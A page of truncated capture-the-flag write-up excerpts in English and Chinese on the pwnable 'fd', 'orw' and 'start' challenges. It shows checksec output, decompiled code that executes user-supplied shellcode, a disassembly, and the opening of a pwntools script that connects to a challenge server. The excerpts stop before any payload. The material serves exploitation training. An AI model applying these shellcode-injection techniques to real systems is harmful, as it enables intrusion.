Toddler’s Bottle fd This game WriteUp is writen after I pass. And, this game is very easy. connect server with user and password ls -l Check if something under folder. I found these: cat fd.c Check the source code. Program verify if command line arguments count more or equal two. If not, program will puts a hint. Continue, program convert argv[1] from ASCII to number, and use the number minus 0x1234....
题目提示: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. checksec: [*] '/home/kkkk/code/orw' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 看一下伪代码: int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); ((void (*)(void))shellcode)(); return 0; } 读取0xc8个字节, 然后转换为函数指针执行 这道题只需要构建一个open read write的shellcode就可以了 可以用pwntools自动完成 from pwn import * context(os="linux", arch="i386", log_level="debug") r = remote("chall....
checksec: [*] '/home/kkkk/code/start' Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) disassem: Dump of assembler code for function _start: => 0x08048060 <+0>: push esp 0x08048061 <+1>: push 0x804809d 0x08048066 <+6>: xor eax,eax 0x08048068 <+8>: xor ebx,ebx 0x0804806a <+10>: xor ecx,ecx 0x0804806c <+12>: xor edx,edx 0x0804806e <+14>: push 0x3a465443 0x08048073 <+19>: push 0x20656874 0x08048078 <+24>: push 0x20747261 0x0804807d <+29>: push 0x74732073 0x08048082 <+34>: push 0x2774654c 0x08048087 <+39>: mov ecx,esp 0x08048089 <+41>: mov dl,0x14 0x0804808b <+43>: mov bl,0x1 0x0804808d <+45>: mov al,0x4 0x0804808f <+47>: int 0x80 0x08048091 <+49>: xor ebx,ebx 0x08048093 <+51>: mov dl,0x3c 0x08048095 <+53>: mov al,0x3 0x08048097 <+55>: int 0x80 0x08048099 <+57>: add esp,0x14 0x0804809c <+60>: ret End of assembler dump....